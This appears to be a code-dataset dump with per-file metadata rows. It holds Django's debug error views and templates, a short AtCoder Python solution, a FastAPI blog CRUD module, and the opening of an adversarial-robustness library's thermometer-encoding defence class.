            # Support for __traceback_hide__ which is used by a few libraries
            # to hide internal frames.
            if tb.tb_frame.f_locals.get('__traceback_hide__'):
                tb = tb.tb_next
                continue
            filename = tb.tb_frame.f_code.co_filename
            function = tb.tb_frame.f_code.co_name
            # tb_lineno is 1-based; source lists are 0-based.
            lineno = tb.tb_lineno - 1
            loader = tb.tb_frame.f_globals.get('__loader__')
            module_name = tb.tb_frame.f_globals.get('__name__') or ''
            pre_context_lineno, pre_context, context_line, post_context = self._get_lines_from_file(filename, lineno, 7, loader, module_name)
            if pre_context_lineno is not None:
                frames.append({
                    'tb': tb,
                    'type': module_name.startswith('django.') and 'django' or 'user',
                    'filename': filename,
                    'function': function,
                    'lineno': lineno + 1,
                    'vars': self.filter.get_traceback_frame_variables(self.request, tb.tb_frame),
                    'id': id(tb),
                    'pre_context': pre_context,
                    'context_line': context_line,
                    'post_context': post_context,
                    'pre_context_lineno': pre_context_lineno + 1,
                })
            tb = tb.tb_next
        return frames

    def format_exception(self):
        """Return the same data as from traceback.format_exception.

        NOTE: the local name 'list' shadows the builtin within this method.
        """
        import traceback
        frames = self.get_traceback_frames()
        tb = [ (f['filename'], f['lineno'], f['function'], f['context_line']) for f in frames ]
        list = ['Traceback (most recent call last):\n']
        list += traceback.format_list(tb)
        list += traceback.format_exception_only(self.exc_type, self.exc_value)
        return list
def technical_404_response(request, exception):
    """Create a technical 404 error response.

    *exception* is the Http404 raised while resolving the URL; its
    args[0]['tried'] (when present) lists the URL patterns that were
    attempted.  If the project is still on the default, effectively-empty
    URLconf, the friendly "It worked!" page is shown instead.
    """
    try:
        tried = exception.args[0]['tried']
    except (IndexError, TypeError, KeyError):
        tried = []
    else:
        if (not tried  # empty URLconf
            or (request.path == '/'
                and len(tried) == 1  # default URLconf
                and len(tried[0]) == 1
                and tried[0][0].app_name == tried[0][0].namespace == 'admin')):
            return default_urlconf(request)
    urlconf = getattr(request, 'urlconf', settings.ROOT_URLCONF)
    if isinstance(urlconf, types.ModuleType):
        urlconf = urlconf.__name__
    t = Template(TECHNICAL_404_TEMPLATE, name='Technical 404 template')
    c = Context({
        'urlconf': urlconf,
        'root_urlconf': settings.ROOT_URLCONF,
        'request_path': request.path_info[1:],  # Trim leading slash
        'urlpatterns': tried,
        # Bug fix: use smart_text, not force_bytes — a bytes object put
        # into the template context renders as "b'...'" on Python 3.
        'reason': smart_text(exception, errors='replace'),
        'request': request,
        'settings': get_safe_settings(),
    })
    return HttpResponseNotFound(t.render(c), content_type='text/html')
def default_urlconf(request):
    """Create an empty URLconf 404 error response (the "It worked!" page)."""
    template = Template(DEFAULT_URLCONF_TEMPLATE, name='Default URLconf template')
    return HttpResponse(template.render(Context({})), content_type='text/html')
#
# Templates are embedded in the file so that we know the error handler will
# always work even if the template loader is broken.
#
TECHNICAL_500_TEMPLATE = """
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="robots" content="NONE,NOARCHIVE">
<title>{% if exception_type %}{{ exception_type }}{% else %}Report{% endif %}{% if request %} at {{ request.path_info|escape }}{% endif %}</title>
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; }
h2 { margin-bottom:.8em; }
h2 span { font-size:80%; color:#666; font-weight:normal; }
h3 { margin:1em 0 .5em 0; }
h4 { margin:0 0 .5em 0; font-weight: normal; }
code, pre { font-size: 100%; white-space: pre-wrap; }
table { border:1px solid #ccc; border-collapse: collapse; width:100%; background:white; }
tbody td, tbody th { vertical-align:top; padding:2px 3px; }
thead th { padding:1px 6px 1px 3px; background:#fefefe; text-align:left; font-weight:normal; font-size:11px; border:1px solid #ddd; }
tbody th { width:12em; text-align:right; color:#666; padding-right:.5em; }
table.vars { margin:5px 0 2px 40px; }
table.vars td, table.req td { font-family:monospace; }
table td.code { width:100%; }
table td.code pre { overflow:hidden; }
table.source th { color:#666; }
table.source td { font-family:monospace; white-space:pre; border-bottom:1px solid #eee; }
ul.traceback { list-style-type:none; color: #222; }
ul.traceback li.frame { padding-bottom:1em; color:#666; }
ul.traceback li.user { background-color:#e0e0e0; color:#000 }
div.context { padding:10px 0; overflow:hidden; }
div.context ol { padding-left:30px; margin:0 10px; list-style-position: inside; }
div.context ol li { font-family:monospace; white-space:pre; color:#777; cursor:pointer; }
div.context ol li pre { display:inline; }
div.context ol.context-line li { color:#505050; background-color:#dfdfdf; }
div.context ol.context-line li span { position:absolute; right:32px; }
.user div.context ol.context-line li { background-color:#bbb; color:#000; }
.user div.context ol li { color:#666; }
div.commands { margin-left: 40px; }
div.commands a { color:#555; text-decoration:none; }
.user div.commands a { color: black; }
#summary { background: #ffc; }
#summary h2 { font-weight: normal; color: #666; }
#explanation { background:#eee; }
#template, #template-not-exist { background:#f6f6f6; }
#template-not-exist ul { margin: 0 0 0 20px; }
#unicode-hint { background:#eee; }
#traceback { background:#eee; }
#requestinfo { background:#f6f6f6; padding-left:120px; }
#summary table { border:none; background:transparent; }
#requestinfo h2, #requestinfo h3 { position:relative; margin-left:-100px; }
#requestinfo h3 { margin-bottom:-1em; }
.error { background: #ffc; }
.specific { color:#cc3300; font-weight:bold; }
h2 span.commands { font-size:.7em;}
span.commands a:link {color:#5E5694;}
pre.exception_value { font-family: sans-serif; color: #666; font-size: 1.5em; margin: 10px 0 10px 0; }
</style>
{% if not is_email %}
<script type="text/javascript">
//<!--
function getElementsByClassName(oElm, strTagName, strClassName){
// Written by Jonathan Snook, http://www.snook.ca/jon; Add-ons by Robert Nyman, http://www.robertnyman.com
var arrElements = (strTagName == "*" && document.all)? document.all :
oElm.getElementsByTagName(strTagName);
var arrReturnElements = new Array();
strClassName = strClassName.replace(/\-/g, "\\-");
var oRegExp = new RegExp("(^|\\s)" + strClassName + "(\\s|$)");
var oElement;
for(var i=0; i<arrElements.length; i++){
oElement = arrElements[i];
if(oRegExp.test(oElement.className)){
arrReturnElements.push(oElement);
}
}
return (arrReturnElements)
}
function hideAll(elems) {
for (var e = 0; e < elems.length; e++) {
elems[e].style.display = 'none';
}
}
window.onload = function() {
hideAll(getElementsByClassName(document, 'table', 'vars'));
hideAll(getElementsByClassName(document, 'ol', 'pre-context'));
hideAll(getElementsByClassName(document, 'ol', 'post-context'));
hideAll(getElementsByClassName(document, 'div', 'pastebin'));
}
function toggle() {
for (var i = 0; i < arguments.length; i++) {
var e = document.getElementById(arguments[i]);
if (e) {
e.style.display = e.style.display == 'none' ? 'block' : 'none';
}
}
return false;
}
function varToggle(link, id) {
toggle('v' + id);
var s = link.getElementsByTagName('span')[0];
var uarr = String.fromCharCode(0x25b6);
var darr = String.fromCharCode(0x25bc);
s.innerHTML = s.innerHTML == uarr ? darr : uarr;
return false;
}
function switchPastebinFriendly(link) {
s1 = "Switch to copy-and-paste view";
s2 = "Switch back to interactive view";
link.innerHTML = link.innerHTML == s1 ? s2 : s1;
toggle('browserTraceback', 'pastebinTraceback');
return false;
}
//-->
</script>
{% endif %}
</head>
<body>
<div id="summary">
<h1>{% if exception_type %}{{ exception_type }}{% else %}Report{% endif %}{% if request %} at {{ request.path_info|escape }}{% endif %}</h1>
<pre class="exception_value">{% if exception_value %}{{ exception_value|force_escape }}{% else %}No exception supplied{% endif %}</pre>
<table class="meta">
{% if request %}
<tr>
<th>Request Method:</th>
<td>{{ request.META.REQUEST_METHOD }}</td>
</tr>
<tr>
<th>Request URL:</th>
<td>{{ request.build_absolute_uri|escape }}</td>
</tr>
{% endif %}
<tr>
<th>Django Version:</th>
<td>{{ django_version_info }}</td>
</tr>
{% if exception_type %}
<tr>
<th>Exception Type:</th>
<td>{{ exception_type }}</td>
</tr>
{% endif %}
{% if exception_type and exception_value %}
<tr>
<th>Exception Value:</th>
<td><pre>{{ exception_value|force_escape }}</pre></td>
</tr>
{% endif %}
{% if lastframe %}
<tr>
<th>Exception Location:</th>
<td>{{ lastframe.filename|escape }} in {{ lastframe.function|escape }}, line {{ lastframe.lineno }}</td>
</tr>
{% endif %}
<tr>
<th>Python Executable:</th>
<td>{{ sys_executable|escape }}</td>
</tr>
<tr>
<th>Python Version:</th>
<td>{{ sys_version_info }}</td>
</tr>
<tr>
<th>Python Path:</th>
<td><pre>{{ sys_path|pprint }}</pre></td>
</tr>
<tr>
<th>Server time:</th>
<td>{{server_time|date:"r"}}</td>
</tr>
</table>
</div>
{% if unicode_hint %}
<div id="unicode-hint">
<h2>Unicode error hint</h2>
<p>The string that could not be encoded/decoded was: <strong>{{ unicode_hint|force_escape }}</strong></p>
</div>
{% endif %}
{% if template_does_not_exist %}
<div id="template-not-exist">
<h2>Template-loader postmortem</h2>
{% if loader_debug_info %}
<p>Django tried loading these templates, in this order:</p>
<ul>
{% for loader in loader_debug_info %}
<li>Using loader <code>{{ loader.loader }}</code>:
<ul>{% for t in loader.templates %}<li><code>{{ t.name }}</code> (File {% if t.exists %}exists{% else %}does not exist{% endif %})</li>{% endfor %}</ul>
</li>
{% endfor %}
</ul>
{% else %}
<p>Django couldn't find any templates because your <code>TEMPLATE_LOADERS</code> setting is empty!</p>
{% endif %}
</div>
{% endif %}
{% if template_info %}
<div id="template">
<h2>Error during template rendering</h2>
<p>In template <code>{{ template_info.name }}</code>, error at line <strong>{{ template_info.line }}</strong></p>
<h3>{{ template_info.message }}</h3>
<table class="source{% if template_info.top %} cut-top{% endif %}{% ifnotequal template_info.bottom template_info.total %} cut-bottom{% endifnotequal %}">
{% for source_line in template_info.source_lines %}
{% ifequal source_line.0 template_info.line %}
<tr class="error"><th>{{ source_line.0 }}</th>
<td>{{ template_info.before }}<span class="specific">{{ template_info.during }}</span>{{ template_info.after }}</td></tr>
{% else %}
<tr><th>{{ source_line.0 }}</th>
<td>{{ source_line.1 }}</td></tr>
{% endifequal %}
{% endfor %}
</table>
</div>
{% endif %}
{% if frames %}
<div id="traceback">
<h2>Traceback <span class="commands">{% if not is_email %}<a href="#" onclick="return switchPastebinFriendly(this);">Switch to copy-and-paste view</a></span>{% endif %}</h2>
{% autoescape off %}
<div id="browserTraceback">
<ul class="traceback">
{% for frame in frames %}
<li class="frame {{ frame.type }}">
<code>{{ frame.filename|escape }}</code> in <code>{{ frame.function|escape }}</code>
{% if frame.context_line %}
<div class="context" id="c{{ frame.id }}">
{% if frame.pre_context and not is_email %}
<ol start="{{ frame.pre_context_lineno }}" class="pre-context" id="pre{{ frame.id }}">{% for line in frame.pre_context %}<li onclick="toggle('pre{{ frame.id }}', 'post{{ frame.id }}')"><pre>{{ line|escape }}</pre></li>{% endfor %}</ol>
{% endif %}
<ol start="{{ frame.lineno }}" class="context-line"><li onclick="toggle('pre{{ frame.id }}', 'post{{ frame.id }}')"><pre>{{ frame.context_line|escape }}</pre>{% if not is_email %} <span>...</span>{% endif %}</li></ol>
{% if frame.post_context and not is_email %}
<ol start='{{ frame.lineno|add:"1" }}' class="post-context" id="post{{ frame.id }}">{% for line in frame.post_context %}<li onclick="toggle('pre{{ frame.id }}', 'post{{ frame.id }}')"><pre>{{ line|escape }}</pre></li>{% endfor %}</ol>
{% endif %}
</div>
{% endif %}
{% if frame.vars %}
<div class="commands">
{% if is_email %}
<h2>Local Vars</h2>
{% else %}
<a href="#" onclick="return varToggle(this, '{{ frame.id }}')"><span>▶</span> Local vars</a>
{% endif %}
</div>
<table class="vars" id="v{{ frame.id }}">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in frame.vars|dictsort:"0" %}
<tr>
<td>{{ var.0|force_escape }}</td>
<td class="code"><pre>{{ var.1 }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% endif %}
</li>
{% endfor %}
</ul>
</div>
{% endautoescape %}
<form action="http://dpaste.com/" name="pasteform" id="pasteform" method="post">
{% if not is_email %}
<div id="pastebinTraceback" class="pastebin">
<input type="hidden" name="language" value="PythonConsole">
<input type="hidden" name="title" value="{{ exception_type|escape }}{% if request %} at {{ request.path_info|escape }}{% endif %}">
<input type="hidden" name="source" value="Django Dpaste Agent">
<input type="hidden" name="poster" value="Django">
<textarea name="content" id="traceback_area" cols="140" rows="25">
Environment:
{% if request %}
Request Method: {{ request.META.REQUEST_METHOD }}
Request URL: {{ request.build_absolute_uri|escape }}
{% endif %}
Django Version: {{ django_version_info }}
Python Version: {{ sys_version_info }}
Installed Applications:
{{ settings.INSTALLED_APPS|pprint }}
Installed Middleware:
{{ settings.MIDDLEWARE_CLASSES|pprint }}
{% if template_does_not_exist %}Template Loader Error:
{% if loader_debug_info %}Django tried loading these templates, in this order:
{% for loader in loader_debug_info %}Using loader {{ loader.loader }}:
{% for t in loader.templates %}{{ t.name }} (File {% if t.exists %}exists{% else %}does not exist{% endif %})
{% endfor %}{% endfor %}
{% else %}Django couldn't find any templates because your TEMPLATE_LOADERS setting is empty!
{% endif %}
{% endif %}{% if template_info %}
Template error:
In template {{ template_info.name }}, error at line {{ template_info.line }}
{{ template_info.message }}{% for source_line in template_info.source_lines %}{% ifequal source_line.0 template_info.line %}
{{ source_line.0 }} : {{ template_info.before }} {{ template_info.during }} {{ template_info.after }}
{% else %}
{{ source_line.0 }} : {{ source_line.1 }}
{% endifequal %}{% endfor %}{% endif %}
Traceback:
{% for frame in frames %}File "{{ frame.filename|escape }}" in {{ frame.function|escape }}
{% if frame.context_line %} {{ frame.lineno }}. {{ frame.context_line|escape }}{% endif %}
{% endfor %}
Exception Type: {{ exception_type|escape }}{% if request %} at {{ request.path_info|escape }}{% endif %}
Exception Value: {{ exception_value|force_escape }}
</textarea>
<br><br>
<input type="submit" value="Share this traceback on a public Web site">
</div>
</form>
</div>
{% endif %}
{% endif %}
<div id="requestinfo">
<h2>Request information</h2>
{% if request %}
<h3 id="get-info">GET</h3>
{% if request.GET %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.GET.items %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No GET data</p>
{% endif %}
<h3 id="post-info">POST</h3>
{% if filtered_POST %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in filtered_POST.items %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No POST data</p>
{% endif %}
<h3 id="files-info">FILES</h3>
{% if request.FILES %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.FILES.items %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No FILES data</p>
{% endif %}
<h3 id="cookie-info">COOKIES</h3>
{% if request.COOKIES %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.COOKIES.items %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No cookie data</p>
{% endif %}
<h3 id="meta-info">META</h3>
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.META.items|dictsort:"0" %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>Request data not supplied</p>
{% endif %}
<h3 id="settings-info">Settings</h3>
<h4>Using settings module <code>{{ settings.SETTINGS_MODULE }}</code></h4>
<table class="req">
<thead>
<tr>
<th>Setting</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in settings.items|dictsort:"0" %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
</div>
{% if not is_email %}
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in your
Django settings file. Change that to <code>False</code>, and Django will
display a standard 500 page.
</p>
</div>
{% endif %}
</body>
</html>
"""
TECHNICAL_500_TEXT_TEMPLATE = """{% firstof exception_type 'Report' %}{% if request %} at {{ request.path_info }}{% endif %}
{% firstof exception_value 'No exception supplied' %}
{% if request %}
Request Method: {{ request.META.REQUEST_METHOD }}
Request URL: {{ request.build_absolute_uri }}{% endif %}
Django Version: {{ django_version_info }}
Python Executable: {{ sys_executable }}
Python Version: {{ sys_version_info }}
Python Path: {{ sys_path }}
Server time: {{server_time|date:"r"}}
Installed Applications:
{{ settings.INSTALLED_APPS|pprint }}
Installed Middleware:
{{ settings.MIDDLEWARE_CLASSES|pprint }}
{% if template_does_not_exist %}Template loader Error:
{% if loader_debug_info %}Django tried loading these templates, in this order:
{% for loader in loader_debug_info %}Using loader {{ loader.loader }}:
{% for t in loader.templates %}{{ t.name }} (File {% if t.exists %}exists{% else %}does not exist{% endif %})
{% endfor %}{% endfor %}
{% else %}Django couldn't find any templates because your TEMPLATE_LOADERS setting is empty!
{% endif %}
{% endif %}{% if template_info %}
Template error:
In template {{ template_info.name }}, error at line {{ template_info.line }}
{{ template_info.message }}{% for source_line in template_info.source_lines %}{% ifequal source_line.0 template_info.line %}
{{ source_line.0 }} : {{ template_info.before }} {{ template_info.during }} {{ template_info.after }}
{% else %}
{{ source_line.0 }} : {{ source_line.1 }}
{% endifequal %}{% endfor %}{% endif %}{% if frames %}
Traceback:
{% for frame in frames %}File "{{ frame.filename }}" in {{ frame.function }}
{% if frame.context_line %} {{ frame.lineno }}. {{ frame.context_line }}{% endif %}
{% endfor %}
{% if exception_type %}Exception Type: {{ exception_type }}{% if request %} at {{ request.path_info }}{% endif %}
{% if exception_value %}Exception Value: {{ exception_value }}{% endif %}{% endif %}{% endif %}
{% if request %}Request information:
GET:{% for k, v in request.GET.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No GET data{% endfor %}
POST:{% for k, v in filtered_POST.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No POST data{% endfor %}
FILES:{% for k, v in request.FILES.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No FILES data{% endfor %}
COOKIES:{% for k, v in request.COOKIES.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No cookie data{% endfor %}
META:{% for k, v in request.META.items|dictsort:"0" %}
{{ k }} = {{ v|stringformat:"r" }}{% endfor %}
{% else %}Request data not supplied
{% endif %}
Settings:
Using settings module {{ settings.SETTINGS_MODULE }}{% for k, v in settings.items|dictsort:"0" %}
{{ k }} = {{ v|stringformat:"r" }}{% endfor %}
You're seeing this error because you have DEBUG = True in your
Django settings file. Change that to False, and Django will
display a standard 500 page.
"""
TECHNICAL_404_TEMPLATE = """
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>Page not found at {{ request.path_info|escape }}</title>
<meta name="robots" content="NONE,NOARCHIVE">
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; background:#eee; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; margin-bottom:.4em; }
h1 span { font-size:60%; color:#666; font-weight:normal; }
table { border:none; border-collapse: collapse; width:100%; }
td, th { vertical-align:top; padding:2px 3px; }
th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#info { background:#f6f6f6; }
#info ol { margin: 0.5em 4em; }
#info ol li { font-family: monospace; }
#summary { background: #ffc; }
#explanation { background:#eee; border-bottom: 0px none; }
</style>
</head>
<body>
<div id="summary">
<h1>Page not found <span>(404)</span></h1>
<table class="meta">
<tr>
<th>Request Method:</th>
<td>{{ request.META.REQUEST_METHOD }}</td>
</tr>
<tr>
<th>Request URL:</th>
<td>{{ request.build_absolute_uri|escape }}</td>
</tr>
</table>
</div>
<div id="info">
{% if urlpatterns %}
<p>
Using the URLconf defined in <code>{{ urlconf }}</code>,
Django tried these URL patterns, in this order:
</p>
<ol>
{% for pattern in urlpatterns %}
<li>
{% for pat in pattern %}
{{ pat.regex.pattern }}
{% if forloop.last and pat.name %}[name='{{ pat.name }}']{% endif %}
{% endfor %}
</li>
{% endfor %}
</ol>
<p>The current URL, <code>{{ request_path|escape }}</code>, didn't match any of these.</p>
{% else %}
<p>{{ reason }}</p>
{% endif %}
</div>
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in
your Django settings file. Change that to <code>False</code>, and Django
will display a standard 404 page.
</p>
</div>
</body>
</html>
"""
DEFAULT_URLCONF_TEMPLATE = """
<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="robots" content="NONE,NOARCHIVE"><title>Welcome to Django</title>
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; }
h2 { margin-bottom:.8em; }
h2 span { font-size:80%; color:#666; font-weight:normal; }
h3 { margin:1em 0 .5em 0; }
h4 { margin:0 0 .5em 0; font-weight: normal; }
table { border:1px solid #ccc; border-collapse: collapse; width:100%; background:white; }
tbody td, tbody th { vertical-align:top; padding:2px 3px; }
thead th { padding:1px 6px 1px 3px; background:#fefefe; text-align:left; font-weight:normal; font-size:11px; border:1px solid #ddd; }
tbody th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#summary { background: #e0ebff; }
#summary h2 { font-weight: normal; color: #666; }
#explanation { background:#eee; }
#instructions { background:#f6f6f6; }
#summary table { border:none; background:transparent; }
</style>
</head>
<body>
<div id="summary">
<h1>It worked!</h1>
<h2>Congratulations on your first Django-powered page.</h2>
</div>
<div id="instructions">
<p>
Of course, you haven't actually done any work yet.
Next, start your first app by running <code>python manage.py startapp [appname]</code>.
</p>
</div>
<div id="explanation">
<p>
You're seeing this message because you have <code>DEBUG = True</code> in your
Django settings file and you haven't configured any URLs. Get to work!
</p>
</div>
</body></html>
"""
| true | true |
1c331d725ab785933f4f8fd885d27ab580d5d5b5 | 34 | py | Python | code/answer_4-2-4.py | KoyanagiHitoshi/AtCoder-Python-Introduction | 6d014e333a873f545b4d32d438e57cf428b10b96 | [
"MIT"
] | 1 | 2022-03-29T13:50:12.000Z | 2022-03-29T13:50:12.000Z | code/answer_4-2-4.py | KoyanagiHitoshi/AtCoder-Python-Introduction | 6d014e333a873f545b4d32d438e57cf428b10b96 | [
"MIT"
] | null | null | null | code/answer_4-2-4.py | KoyanagiHitoshi/AtCoder-Python-Introduction | 6d014e333a873f545b4d32d438e57cf428b10b96 | [
"MIT"
] | null | null | null | S, T = input().split()
print(T+S)
| 11.333333 | 22 | 0.558824 | S, T = input().split()
print(T+S)
| true | true |
1c331d987ad5b34a2b09716f44ad466887f0b6b2 | 2,424 | py | Python | api/blog.py | yezz123/DogeAPI | 91e719ad8f252578728ee2a427fd6b733f0cf2a8 | [
"MIT"
] | 93 | 2021-05-13T00:13:19.000Z | 2022-03-30T03:55:09.000Z | api/blog.py | yezz123/DogeAPI | 91e719ad8f252578728ee2a427fd6b733f0cf2a8 | [
"MIT"
] | 17 | 2021-05-16T14:49:24.000Z | 2021-10-18T23:29:48.000Z | api/blog.py | yezz123/DogeAPI | 91e719ad8f252578728ee2a427fd6b733f0cf2a8 | [
"MIT"
] | 22 | 2021-05-13T08:32:59.000Z | 2022-02-23T13:07:05.000Z | #!/usr/bin/python3
from fastapi import HTTPException, status
from sqlalchemy.orm import Session
from models import models
from schema import schemas
def get_all(db: Session):
    """Return every blog stored in the database.

    Args:
        db (Session): Active database session.

    Returns:
        List[models.Blog]: All blog rows.
    """
    blogs = db.query(models.Blog).all()
    return blogs
def create(request: schemas.Blog, db: Session):
    """Persist a new blog entry.

    Args:
        request (schemas.Blog): Incoming blog payload.
        db (Session): Active database session.

    Returns:
        models.Blog: The freshly persisted blog row.
    """
    # NOTE(review): user_id is hard-coded to 1 here — presumably a
    # placeholder; confirm against the authentication layer.
    blog = models.Blog(title=request.title, body=request.body, user_id=1)
    db.add(blog)
    db.commit()
    db.refresh(blog)
    return blog
def destroy(id: int, db: Session):
    """Delete the blog identified by ``id``.

    Args:
        id (int): Blog id.
        db (Session): Active database session.

    Raises:
        HTTPException: 404 if no blog with that id exists.

    Returns:
        set: ``{"done"}`` on success (kept for API compatibility).
    """
    query = db.query(models.Blog).filter(models.Blog.id == id)
    if not query.first():
        raise HTTPException(
            status_code=status.HTTP_404_NOT_FOUND,
            detail=f"Blog with id {id} not found.",
        )
    query.delete(synchronize_session=False)
    db.commit()
    return {"done"}
def update(id: int, request: schemas.Blog, db: Session):
    """Overwrite the blog identified by ``id`` with the request payload.

    Args:
        id (int): Blog id.
        request (schemas.Blog): Replacement field values.
        db (Session): Active database session.

    Raises:
        HTTPException: 404 if no blog with that id exists.

    Returns:
        str: ``"updated"`` on success.
    """
    query = db.query(models.Blog).filter(models.Blog.id == id)
    if not query.first():
        raise HTTPException(
            status_code=status.HTTP_404_NOT_FOUND, detail=f"Blog with id {id} not found"
        )
    # NOTE(review): relies on request.__dict__ mapping directly onto column
    # names — verify this stays true if the schema gains extra fields.
    query.update(request.__dict__)
    db.commit()
    return "updated"
def show(id: int, db: Session):
    """Fetch a single blog by id.

    Args:
        id (int): Blog id.
        db (Session): Active database session.

    Raises:
        HTTPException: 404 if no blog with that id exists.

    Returns:
        models.Blog: The matching blog row.
    """
    blog = db.query(models.Blog).filter(models.Blog.id == id).first()
    if not blog:
        raise HTTPException(
            status_code=status.HTTP_404_NOT_FOUND,
            detail=f"Blog with the id {id} is not available",
        )
    return blog
| 21.263158 | 88 | 0.604373 |
from fastapi import HTTPException, status
from sqlalchemy.orm import Session
from models import models
from schema import schemas
def get_all(db: Session):
return db.query(models.Blog).all()
def create(request: schemas.Blog, db: Session):
new_blog = models.Blog(title=request.title, body=request.body, user_id=1)
db.add(new_blog)
db.commit()
db.refresh(new_blog)
return new_blog
def destroy(id: int, db: Session):
blog_to_delete = db.query(models.Blog).filter(models.Blog.id == id)
if not blog_to_delete.first():
raise HTTPException(
status_code=status.HTTP_404_NOT_FOUND,
detail=f"Blog with id {id} not found.",
)
blog_to_delete.delete(synchronize_session=False)
db.commit()
return {"done"}
def update(id: int, request: schemas.Blog, db: Session):
blog = db.query(models.Blog).filter(models.Blog.id == id)
if not blog.first():
raise HTTPException(
status_code=status.HTTP_404_NOT_FOUND, detail=f"Blog with id {id} not found"
)
blog.update(request.__dict__)
db.commit()
return "updated"
def show(id: int, db: Session):
blog = db.query(models.Blog).filter(models.Blog.id == id).first()
if blog:
return blog
else:
raise HTTPException(
status_code=status.HTTP_404_NOT_FOUND,
detail=f"Blog with the id {id} is not available",
)
| true | true |
1c331dc6c1d546c5e719dd970de5dc96e49ca31d | 4,429 | py | Python | art/defences/thermometer_encoding.py | lr2582858/adversarial-robustness-toolbox | ee3b7ac1ef21fcfd21501070aff2f8eb9db70301 | [
"MIT"
] | 1 | 2018-11-23T06:44:43.000Z | 2018-11-23T06:44:43.000Z | art/defences/thermometer_encoding.py | lr2582858/adversarial-robustness-toolbox | ee3b7ac1ef21fcfd21501070aff2f8eb9db70301 | [
"MIT"
] | null | null | null | art/defences/thermometer_encoding.py | lr2582858/adversarial-robustness-toolbox | ee3b7ac1ef21fcfd21501070aff2f8eb9db70301 | [
"MIT"
] | null | null | null | # MIT License
#
# Copyright (C) IBM Corporation 2018
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
# Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import numpy as np
from art.defences.preprocessor import Preprocessor
from art.utils import to_categorical
from art import NUMPY_DTYPE
logger = logging.getLogger(__name__)
class ThermometerEncoding(Preprocessor):
    """
    Implement the thermometer encoding defence approach. Defence method from https://openreview.net/forum?id=S18Su--CW.
    """
    params = ['num_space']

    def __init__(self, num_space=10):
        """
        Create an instance of thermometer encoding.

        :param num_space: Number of evenly spaced levels within [0, 1].
        :type num_space: `int`
        """
        super(ThermometerEncoding, self).__init__()
        self._is_fitted = True
        self.set_params(num_space=num_space)

    def __call__(self, x, y=None, num_space=None, clip_values=(0, 1)):
        """
        Apply thermometer encoding to sample `x`.

        :param x: Sample to encode with shape `(batch_size, width, height, depth)`.
        :type x: `np.ndarray`
        :param y: Labels of the sample `x`. This function does not affect them in any way.
        :type y: `np.ndarray`
        :param num_space: Number of evenly spaced levels within [0, 1].
        :type num_space: `int`
        :param clip_values: Tuple `(min, max)` the encoded result is clipped to.
        :type clip_values: `tuple`
